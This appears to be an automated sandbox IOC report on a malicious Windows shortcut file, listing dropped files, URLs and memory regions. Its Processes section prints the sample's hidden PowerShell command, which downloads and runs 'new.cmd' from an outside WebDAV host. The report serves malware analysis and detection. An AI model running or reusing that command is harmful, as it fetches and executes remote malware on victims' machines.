IOC Report
SCANNED.Ink.lnk

loading gif

Files

File Path
Type
Category
Malicious
SCANNED.Ink.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=1, Archive, ctime=Fri Feb 2 17:37:06 2018, mtime=Fri Feb 2 17:37:12 2018, atime=Fri Feb 2 17:37:06 2018, length=446976, window=hide
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_okj1m1nk.ho0.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qyzsgb5d.j2j.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\COXPMAZREWI46YJA5PXF.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b0af348238f4e71f.customDestinations-ms (copy)
data
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c "Copy-Item '\\invoicetrycloudflare.com@9983\DavWWWRoot\new.cmd' \"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\new.cmd\" -WindowStyle Hidden"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://oneget.orgX
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
https://oneget.org
unknown
There are 3 hidden URLs, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
7FFD9BAA0000
trusted library allocation
page read and write
7FFD9B930000
trusted library allocation
page execute and read and write
2DBAB228000
heap
page read and write
2DB90EC1000
heap
page read and write
2DBAAF5A000
heap
page read and write
7FFD9BA20000
trusted library allocation
page read and write
7FFD9B960000
trusted library allocation
page read and write
2DB94648000
trusted library allocation
page read and write
2DB90DC0000
heap
page read and write
2DB928C0000
heap
page readonly
2DBAB1C5000
heap
page read and write
2DB9464E000
trusted library allocation
page read and write
2DB928B0000
trusted library allocation
page read and write
2DB94977000
trusted library allocation
page read and write
7FFD9BA50000
trusted library allocation
page read and write
2DBAAF5C000
heap
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
DDA89F7000
stack
page read and write
2DBA2E84000
trusted library allocation
page read and write
DDA81EF000
stack
page read and write
2DB946F5000
trusted library allocation
page read and write
DDA8BFE000
stack
page read and write
2DB92E9B000
trusted library allocation
page read and write
2DB94293000
trusted library allocation
page read and write
2DB90EBA000
heap
page read and write
7FFD9B950000
trusted library allocation
page execute and read and write
2DB928D0000
trusted library allocation
page read and write
7FFD9B980000
trusted library allocation
page read and write
7FFD9B764000
trusted library allocation
page read and write
2DBAB21D000
heap
page read and write
7FFD9B911000
trusted library allocation
page read and write
2DBAAF56000
heap
page read and write
DDA867B000
stack
page read and write
DDA8A7F000
stack
page read and write
7FFD9B880000
trusted library allocation
page execute and read and write
2DB90E47000
heap
page read and write
7DF4ECF10000
trusted library allocation
page execute and read and write
7FFD9B9B0000
trusted library allocation
page read and write
2DB947E4000
trusted library allocation
page read and write
7FFD9B780000
trusted library allocation
page read and write
DDA84FE000
stack
page read and write
2DB92920000
heap
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
2DB92DD0000
heap
page execute and read and write
7FFD9BA60000
trusted library allocation
page read and write
DDA85FE000
stack
page read and write
7FFD9B920000
trusted library allocation
page execute and read and write
7FFD9B990000
trusted library allocation
page read and write
2DB927B5000
heap
page read and write
DDA81A5000
stack
page read and write
2DB90EBF000
heap
page read and write
7FFD9B942000
trusted library allocation
page read and write
2DBAB01E000
heap
page read and write
2DB9442A000
trusted library allocation
page read and write
7FFD9B900000
trusted library allocation
page read and write
7FFD9B81C000
trusted library allocation
page execute and read and write
7FFD9B820000
trusted library allocation
page execute and read and write
2DB90E8A000
heap
page read and write
7FFD9B770000
trusted library allocation
page read and write
7FFD9BA90000
trusted library allocation
page read and write
7FFD9B91A000
trusted library allocation
page read and write
2DBAB1C9000
heap
page read and write
DDA8979000
stack
page read and write
2DBAB000000
heap
page read and write
2DB94650000
trusted library allocation
page read and write
2DB90EF8000
heap
page read and write
7FFD9BA30000
trusted library allocation
page read and write
2DB90DD0000
heap
page read and write
2DB9466F000
trusted library allocation
page read and write
2DB90EF6000
heap
page read and write
2DBAAF54000
heap
page read and write
2DB90EAE000
heap
page read and write
7FFD9BA80000
trusted library allocation
page read and write
2DBAB1B7000
heap
page execute and read and write
2DB94A3C000
trusted library allocation
page read and write
DDA87FD000
stack
page read and write
2DBAAF9A000
heap
page read and write
7FFD9B816000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page read and write
2DBAB20A000
heap
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
2DB9469A000
trusted library allocation
page read and write
DDA847E000
stack
page read and write
2DBA2E11000
trusted library allocation
page read and write
2DBAB1C0000
heap
page read and write
7FFD9BA00000
trusted library allocation
page read and write
2DBAAF20000
heap
page read and write
7FFD9B763000
trusted library allocation
page execute and read and write
DDA8AFE000
stack
page read and write
2DB93F91000
trusted library allocation
page read and write
2DB94A40000
trusted library allocation
page read and write
2DB926B0000
heap
page read and write
2DB90DC5000
heap
page read and write
2DB90E8C000
heap
page read and write
2DB90CC0000
heap
page read and write
2DB90DA0000
heap
page read and write
7FFD9B7BC000
trusted library allocation
page execute and read and write
2DBAB040000
heap
page read and write
2DB93042000
trusted library allocation
page read and write
7FFD9B810000
trusted library allocation
page read and write
7FFD9B762000
trusted library allocation
page read and write
2DB943E3000
trusted library allocation
page read and write
2DB90EB1000
heap
page read and write
2DB93A42000
trusted library allocation
page read and write
DDA964E000
stack
page read and write
2DB92880000
trusted library allocation
page read and write
DDA88F6000
stack
page read and write
2DB927B0000
heap
page read and write
7FFD9BA40000
trusted library allocation
page read and write
7FFD9BA70000
trusted library allocation
page read and write
DDA857D000
stack
page read and write
2DB90ECE000
heap
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
7FFD9B846000
trusted library allocation
page execute and read and write
7FFD9B9E0000
trusted library allocation
page read and write
2DBA2FC7000
trusted library allocation
page read and write
7FFD9B77B000
trusted library allocation
page read and write
DDA8C7B000
stack
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
2DB92950000
heap
page read and write
DDA8878000
stack
page read and write
2DB90E10000
heap
page read and write
7FFD9B970000
trusted library allocation
page read and write
7FFD9B76D000
trusted library allocation
page execute and read and write
2DB92CD0000
trusted library allocation
page read and write
2DB92E00000
heap
page execute and read and write
2DB92E11000
trusted library allocation
page read and write
2DBAB1B0000
heap
page execute and read and write
2DB90E95000
heap
page read and write
2DBA2E20000
trusted library allocation
page read and write
2DBAB21A000
heap
page read and write
DDA86FF000
stack
page read and write
DDA877E000
stack
page read and write
2DBAAE11000
heap
page read and write
2DB90E22000
heap
page read and write
2DB92CD3000
trusted library allocation
page read and write
There are 126 hidden memdumps, click here to show them.